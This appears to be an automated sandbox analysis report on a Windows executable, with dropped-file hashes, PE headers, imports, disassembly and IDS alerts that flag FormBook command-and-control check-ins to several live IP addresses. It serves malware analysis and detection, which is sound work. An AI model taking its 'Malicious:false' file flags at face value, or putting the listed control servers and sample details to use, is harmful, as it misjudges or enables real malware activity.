                                                                SSDEEP:384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
                                                                MD5:9A809AD8B1FDDA60760BB6253358A1DB
                                                                SHA1:D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
                                                                SHA-256:95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
                                                                SHA-512:2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
                                                                Malicious:false
                                                                Reputation:moderate, very likely benign file
                                                                Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                C:\Users\user\AppData\Local\Temp\Bactris

                                                                Download File
                                                                Process:C:\Users\user\Desktop\xaqnaB0rcW.exe
                                                                File Type:data
                                                                Category:modified
                                                                Size (bytes):287744
                                                                Entropy (8bit):7.992827042528865
                                                                Encrypted:true
                                                                SSDEEP:6144:zoa+xlR9ayzf/4azq/zfCvPRslvulhZUfheT0wBRB:szxlvaaf/jqDMMulh4hYVJ
                                                                MD5:974F9C3D17E6C19AA3614BE4C06232E3
                                                                SHA1:62A6C991ECF060E024C2A5B5AE8358508C2279A3
                                                                SHA-256:F3A828E0CED7034FDF4B4030E01246B399F8CB436C90EEF106F0D1C94DD63D44
                                                                SHA-512:A2BF05A5FD5300CA6A9EFB238691F30E5B4F27BC855274D168C2FEF787DE9E2AF33B0864FA37BF8008A26B75C9CDFE93D1EB8044FF08DC68DE6F9AF124EEA7FE
                                                                Malicious:false
                                                                Reputation:low
                                                                Preview:...6WRB704H3.0K.CRR6TRBw44H34P0KACRR6TRB744H34P0KACRR6TRB74.H34^/.OC.[.u.C{...[]#.;3,5 W9r!VZZ'G.2Uk36<r_:r.xg.%\P5.FLIvR6TRB74MI:.mP,.~25.i2%......0W.[....45.-....T7..( :oV3.B744H34P`.AC.S7T..pb4H34P0KA.RP7_SI74fL34P0KACRR.@RB7$4H3DT0KA.RR&TRB544N34P0KACTR6TRB744874P2KACRR6VR..44X34@0KACBR6DRB744H#4P0KACRR6TRB744H34P0KACRR6TRB744H34P0KACRR6TRB744H34P0KACRR6TRB744H34P0KACRR6TRB744H34P0KACRR6TRB744H34P0KACRR6TRB744H34P0KACRR6TRB.@Q0G4P0..GRR&TRBe04H#4P0KACRR6TRB74.H3TP0KACRR6TRB744H34P0KACRR6TRB744H34P0KACRR6TRB744H34P0KACRR6TRB744H34P0KACRR6TRB744H34P0KACRR6TRB744H34P0KACRR6TRB744H34P0KACRR6TRB744H34P0KACRR6TRB744H34P0KACRR6TRB744H34P0KACRR6TRB744H34P0KACRR6TRB744H34P0KACRR6TRB744H34P0KACRR6TRB744H34P0KACRR6TRB744H34P0KACRR6TRB744H34P0KACRR6TRB744H34P0KACRR6TRB744H34P0KACRR6TRB744H34P0KACRR6TRB744H34P0KACRR6TRB744H34P0KACRR6TRB744H34P0KACRR6TRB744H34P0KACRR6TRB744H34P0KACRR6TRB744H34P0KACRR6TRB744H34P0KACRR6TRB744H34P0KACRR6TRB744H34P0KACRR6TRB744H34P0KACRR6TRB744H34P0KACRR6TRB744H34P

                                                                C:\Users\user\AppData\Local\Temp\aut48E4.tmp

                                                                Download File
                                                                Process:C:\Users\user\Desktop\xaqnaB0rcW.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):287744
                                                                Entropy (8bit):7.992827042528865
                                                                Encrypted:true
                                                                SSDEEP:6144:zoa+xlR9ayzf/4azq/zfCvPRslvulhZUfheT0wBRB:szxlvaaf/jqDMMulh4hYVJ
                                                                MD5:974F9C3D17E6C19AA3614BE4C06232E3
                                                                SHA1:62A6C991ECF060E024C2A5B5AE8358508C2279A3
                                                                SHA-256:F3A828E0CED7034FDF4B4030E01246B399F8CB436C90EEF106F0D1C94DD63D44
                                                                SHA-512:A2BF05A5FD5300CA6A9EFB238691F30E5B4F27BC855274D168C2FEF787DE9E2AF33B0864FA37BF8008A26B75C9CDFE93D1EB8044FF08DC68DE6F9AF124EEA7FE
                                                                Malicious:false
                                                                Reputation:low
                                                                Preview:...6WRB704H3.0K.CRR6TRBw44H34P0KACRR6TRB744H34P0KACRR6TRB74.H34^/.OC.[.u.C{...[]#.;3,5 W9r!VZZ'G.2Uk36<r_:r.xg.%\P5.FLIvR6TRB74MI:.mP,.~25.i2%......0W.[....45.-....T7..( :oV3.B744H34P`.AC.S7T..pb4H34P0KA.RP7_SI74fL34P0KACRR.@RB7$4H3DT0KA.RR&TRB544N34P0KACTR6TRB744874P2KACRR6VR..44X34@0KACBR6DRB744H#4P0KACRR6TRB744H34P0KACRR6TRB744H34P0KACRR6TRB744H34P0KACRR6TRB744H34P0KACRR6TRB744H34P0KACRR6TRB744H34P0KACRR6TRB744H34P0KACRR6TRB.@Q0G4P0..GRR&TRBe04H#4P0KACRR6TRB74.H3TP0KACRR6TRB744H34P0KACRR6TRB744H34P0KACRR6TRB744H34P0KACRR6TRB744H34P0KACRR6TRB744H34P0KACRR6TRB744H34P0KACRR6TRB744H34P0KACRR6TRB744H34P0KACRR6TRB744H34P0KACRR6TRB744H34P0KACRR6TRB744H34P0KACRR6TRB744H34P0KACRR6TRB744H34P0KACRR6TRB744H34P0KACRR6TRB744H34P0KACRR6TRB744H34P0KACRR6TRB744H34P0KACRR6TRB744H34P0KACRR6TRB744H34P0KACRR6TRB744H34P0KACRR6TRB744H34P0KACRR6TRB744H34P0KACRR6TRB744H34P0KACRR6TRB744H34P0KACRR6TRB744H34P0KACRR6TRB744H34P0KACRR6TRB744H34P0KACRR6TRB744H34P0KACRR6TRB744H34P0KACRR6TRB744H34P0KACRR6TRB744H34P

                                                                Static File Info

                                                                General

                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                Entropy (8bit):7.156536509425237
                                                                TrID:
                                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                File name:xaqnaB0rcW.exe
                                                                File size:1'223'680 bytes
                                                                MD5:dd5acffde51ef27c585911dea96c4336
                                                                SHA1:62a6b77a79d556fe171fdafea079fc88e400c42e
                                                                SHA256:dc710b8bed55e4cf0b6454836e15714ede75a8fa952d2756cb9b437425a6f6e9
                                                                SHA512:f3ae79e9a99e24f08c30af3a60fb116d59e9a50facaf77aa01fa8c54981763db223d2299327d20241dcbba1c2feb91491c0d15fcbdc2f38052fc6634552ae54b
                                                                SSDEEP:24576:Qtb20pkaCqT5TBWgNQ7aIaY6iFSJh6hgVu2vevI6A:ZVg5tQ7aIaYqJMh0u6eg5
                                                                TLSH:F445D01363DDC361C3B25273BA15BB01BEBB782506A5F56B2FD8083DE920162525EB73
                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d..............'.a.....H.k.....H.h.....H.i......}%......}5...............~.......k.......o.......1.......j.....Rich...........

                                                                File Icon

                                                                Icon Hash:aaf3e3e3938382a0

                                                                Static PE Info

                                                                General

                                                                Entrypoint:0x425f74
                                                                Entrypoint Section:.text
                                                                Digitally signed:false
                                                                Imagebase:0x400000
                                                                Subsystem:windows gui
                                                                Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                Time Stamp:0x6748FCB9 [Thu Nov 28 23:28:57 2024 UTC]
                                                                TLS Callbacks:
                                                                CLR (.Net) Version:
                                                                OS Version Major:5
                                                                OS Version Minor:1
                                                                File Version Major:5
                                                                File Version Minor:1
                                                                Subsystem Version Major:5
                                                                Subsystem Version Minor:1
                                                                Import Hash:3d95adbf13bbe79dc24dccb401c12091

                                                                Entrypoint Preview

                                                                Instruction
                                                                call 00007F3A2CF030AFh
                                                                jmp 00007F3A2CEF60C4h
                                                                int3
                                                                int3
                                                                push edi
                                                                push esi
                                                                mov esi, dword ptr [esp+10h]
                                                                mov ecx, dword ptr [esp+14h]
                                                                mov edi, dword ptr [esp+0Ch]
                                                                mov eax, ecx
                                                                mov edx, ecx
                                                                add eax, esi
                                                                cmp edi, esi
                                                                jbe 00007F3A2CEF624Ah
                                                                cmp edi, eax
                                                                jc 00007F3A2CEF65AEh
                                                                bt dword ptr [004C0158h], 01h
                                                                jnc 00007F3A2CEF6249h
                                                                rep movsb
                                                                jmp 00007F3A2CEF655Ch
                                                                cmp ecx, 00000080h
                                                                jc 00007F3A2CEF6414h
                                                                mov eax, edi
                                                                xor eax, esi
                                                                test eax, 0000000Fh
                                                                jne 00007F3A2CEF6250h
                                                                bt dword ptr [004BA370h], 01h
                                                                jc 00007F3A2CEF6720h
                                                                bt dword ptr [004C0158h], 00000000h
                                                                jnc 00007F3A2CEF63EDh
                                                                test edi, 00000003h
                                                                jne 00007F3A2CEF63FEh
                                                                test esi, 00000003h
                                                                jne 00007F3A2CEF63DDh
                                                                bt edi, 02h
                                                                jnc 00007F3A2CEF624Fh
                                                                mov eax, dword ptr [esi]
                                                                sub ecx, 04h
                                                                lea esi, dword ptr [esi+04h]
                                                                mov dword ptr [edi], eax
                                                                lea edi, dword ptr [edi+04h]
                                                                bt edi, 03h
                                                                jnc 00007F3A2CEF6253h
                                                                movq xmm1, qword ptr [esi]
                                                                sub ecx, 08h
                                                                lea esi, dword ptr [esi+08h]
                                                                movq qword ptr [edi], xmm1
                                                                lea edi, dword ptr [edi+08h]
                                                                test esi, 00000007h
                                                                je 00007F3A2CEF62A5h
                                                                bt esi, 03h
                                                                jnc 00007F3A2CEF62F8h
                                                                movdqa xmm1, dqword ptr [esi+00h]

                                                                Rich Headers

                                                                Programming Language:
                                                                • [ C ] VS2008 SP1 build 30729
                                                                • [IMP] VS2008 SP1 build 30729
                                                                • [ASM] VS2012 UPD4 build 61030
                                                                • [RES] VS2012 UPD4 build 61030
                                                                • [LNK] VS2012 UPD4 build 61030

                                                                Data Directories

                                                                NameVirtual AddressVirtual Size Is in Section
                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0xb70040x17c.rdata
                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0xc40000x61b8c.rsrc
                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x1260000x6c4c.reloc
                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x8d8d00x1c.rdata
                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xb27300x40.rdata
                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_IAT0x8d0000x860.rdata
                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                Sections

                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                .text0x10000x8b54f0x8b600f437a6545e938612764dbb0a314376fcFalse0.5699499019058296data6.680413749210956IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                .rdata0x8d0000x2cc420x2ce00827ffd24759e8e420890ecf164be989eFalse0.330464397632312data5.770192333189168IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                .data0xba0000x9d540x6200e0a519f8e3a35fae0d9c2cfd5a4bacfcFalse0.16402264030612246data2.002691099965349IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                .rsrc0xc40000x61b8c0x61c00f25cbd6cc2e7b75abd547f380651c405False0.9331716552109974data7.904776456505914IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                .reloc0x1260000xa4740xa6000bc98f8631ef0bde830a7f83bb06ff08False0.5017884036144579data5.245426654116355IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                Resources

                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                RT_ICON0xc45a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                                RT_ICON0xc46d00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                                RT_ICON0xc47f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                                RT_ICON0xc49200x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                                                                RT_ICON0xc4c080x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                                                                RT_ICON0xc4d300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                                                                RT_ICON0xc5bd80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                                                                RT_ICON0xc64800x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                                                                RT_ICON0xc69e80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                                                                RT_ICON0xc8f900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                                                                RT_ICON0xca0380x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                                                                RT_MENU0xca4a00x50dataEnglishGreat Britain0.9
                                                                RT_STRING0xca4f00x594dataEnglishGreat Britain0.3333333333333333
                                                                RT_STRING0xcaa840x68adataEnglishGreat Britain0.2747909199522103
                                                                RT_STRING0xcb1100x490dataEnglishGreat Britain0.3715753424657534
                                                                RT_STRING0xcb5a00x5fcdataEnglishGreat Britain0.3087467362924282
                                                                RT_STRING0xcbb9c0x65cdataEnglishGreat Britain0.34336609336609336
                                                                RT_STRING0xcc1f80x466dataEnglishGreat Britain0.3605683836589698
                                                                RT_STRING0xcc6600x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                                                RT_RCDATA0xcc7b80x58e91data1.0003322560183647
                                                                RT_GROUP_ICON0x12564c0x76dataEnglishGreat Britain0.6610169491525424
                                                                RT_GROUP_ICON0x1256c40x14dataEnglishGreat Britain1.25
                                                                RT_GROUP_ICON0x1256d80x14dataEnglishGreat Britain1.15
                                                                RT_GROUP_ICON0x1256ec0x14dataEnglishGreat Britain1.25
                                                                RT_VERSION0x1257000xdcdataEnglishGreat Britain0.6181818181818182
                                                                RT_MANIFEST0x1257dc0x3b0ASCII text, with CRLF line terminatorsEnglishGreat Britain0.5116525423728814

                                                                Imports

                                                                DLLImport
                                                                WSOCK32.dll__WSAFDIsSet, recv, send, setsockopt, ntohs, recvfrom, select, WSAStartup, htons, accept, listen, bind, closesocket, connect, WSACleanup, ioctlsocket, sendto, WSAGetLastError, inet_addr, gethostbyname, gethostname, socket
                                                                VERSION.dllGetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
                                                                WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                                COMCTL32.dllImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_Create, InitCommonControlsEx, ImageList_ReplaceIcon
                                                                MPR.dllWNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                                                                WININET.dllInternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetConnectW, InternetQueryDataAvailable
                                                                PSAPI.DLLGetProcessMemoryInfo
                                                                IPHLPAPI.DLLIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                                                                USERENV.dllUnloadUserProfile, DestroyEnvironmentBlock, CreateEnvironmentBlock, LoadUserProfileW
                                                                UxTheme.dllIsThemeActive
                                                                KERNEL32.dllHeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetCurrentThread, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, DeleteCriticalSection, WaitForSingleObject, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, CloseHandle, GetLastError, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, RaiseException, InitializeCriticalSectionAndSpinCount, InterlockedDecrement, InterlockedIncrement, CreateThread, DuplicateHandle, EnterCriticalSection, GetCurrentProcess, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, HeapSize, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, SetFilePointer, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, HeapReAlloc, WriteConsoleW, SetEndOfFile, DeleteFileW, SetEnvironmentVariableA
                                                                USER32.dllSetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, DrawMenuBar, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, MonitorFromRect, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, CopyImage, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, UnregisterHotKey, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, DeleteMenu, PeekMessageW, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, CharLowerBuffW, GetWindowTextW
                                                                GDI32.dllSetPixel, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, GetDeviceCaps, CloseFigure, LineTo, AngleArc, CreateCompatibleBitmap, CreateCompatibleDC, MoveToEx, Ellipse, PolyDraw, BeginPath, SelectObject, StretchBlt, GetDIBits, DeleteDC, GetPixel, CreateDCW, GetStockObject, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, EndPath
                                                                COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                                                                ADVAPI32.dllGetAclInformation, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, InitiateSystemShutdownExW, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, SetSecurityDescriptorDacl, AddAce, GetAce
                                                                SHELL32.dllDragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                                ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
                                                                OLEAUT32.dllRegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, UnRegisterTypeLib, SafeArrayCreateVector, SysAllocString, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, QueryPathOfRegTypeLib, VariantCopy, VariantClear, CreateDispTypeInfo, CreateStdDispatch, DispCallFunc, VariantChangeType, SafeArrayAllocDescriptorEx, VariantInit

                                                                Possible Origin

                                                                Language of compilation systemCountry where language is spokenMap
                                                                EnglishGreat Britain

                                                                Network Behavior

                                                                Suricata IDS Alerts

                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                2025-01-11T09:15:09.196526+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.749970104.21.28.6580TCP
                                                                2025-01-11T09:15:11.466798+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.749971104.21.28.6580TCP
                                                                2025-01-11T09:15:13.353106+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.749972104.21.28.6580TCP
                                                                2025-01-11T09:15:22.542645+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.749974104.21.54.12680TCP
                                                                2025-01-11T09:15:25.063268+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.749975104.21.54.12680TCP
                                                                2025-01-11T09:15:27.725310+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.749976104.21.54.12680TCP
                                                                2025-01-11T09:15:36.803552+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.74997869.57.163.6480TCP
                                                                2025-01-11T09:15:39.337096+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.74997969.57.163.6480TCP
                                                                2025-01-11T09:15:41.881785+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.74998069.57.163.6480TCP
                                                                2025-01-11T09:15:50.716775+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.749982101.32.205.6180TCP
                                                                2025-01-11T09:15:53.502097+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.749983101.32.205.6180TCP
                                                                2025-01-11T09:15:55.731402+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.749984101.32.205.6180TCP
                                                                2025-01-11T09:16:05.145567+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.749986103.159.36.6680TCP
                                                                2025-01-11T09:16:07.695434+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.749987103.159.36.6680TCP
                                                                2025-01-11T09:16:10.742732+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.749988103.159.36.6680TCP

                                                                Network Port Distribution

                                                                TCP Packets

                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Jan 11, 2025 09:14:51.469733953 CET4996880192.168.2.720.2.208.137
                                                                Jan 11, 2025 09:14:51.474545956 CET804996820.2.208.137192.168.2.7
                                                                Jan 11, 2025 09:14:51.474658012 CET4996880192.168.2.720.2.208.137
                                                                Jan 11, 2025 09:14:51.486809969 CET4996880192.168.2.720.2.208.137
                                                                Jan 11, 2025 09:14:51.491561890 CET804996820.2.208.137192.168.2.7
                                                                Jan 11, 2025 09:14:52.369959116 CET804996820.2.208.137192.168.2.7
                                                                Jan 11, 2025 09:14:52.370023012 CET804996820.2.208.137192.168.2.7
                                                                Jan 11, 2025 09:14:52.370150089 CET4996880192.168.2.720.2.208.137
                                                                Jan 11, 2025 09:14:52.403295994 CET4996880192.168.2.720.2.208.137
                                                                Jan 11, 2025 09:14:52.408164978 CET804996820.2.208.137192.168.2.7
                                                                Jan 11, 2025 09:15:07.467371941 CET4997080192.168.2.7104.21.28.65
                                                                Jan 11, 2025 09:15:07.472330093 CET8049970104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:07.472433090 CET4997080192.168.2.7104.21.28.65
                                                                Jan 11, 2025 09:15:07.672692060 CET4997080192.168.2.7104.21.28.65
                                                                Jan 11, 2025 09:15:07.677747965 CET8049970104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:09.196526051 CET4997080192.168.2.7104.21.28.65
                                                                Jan 11, 2025 09:15:09.201607943 CET8049970104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:09.204683065 CET4997080192.168.2.7104.21.28.65
                                                                Jan 11, 2025 09:15:10.216443062 CET4997180192.168.2.7104.21.28.65
                                                                Jan 11, 2025 09:15:10.221287966 CET8049971104.21.28.65192.168.2.7
                                                                Jan 11, 2025 09:15:10.221436977 CET4997180192.168.2.7104.21.28.65
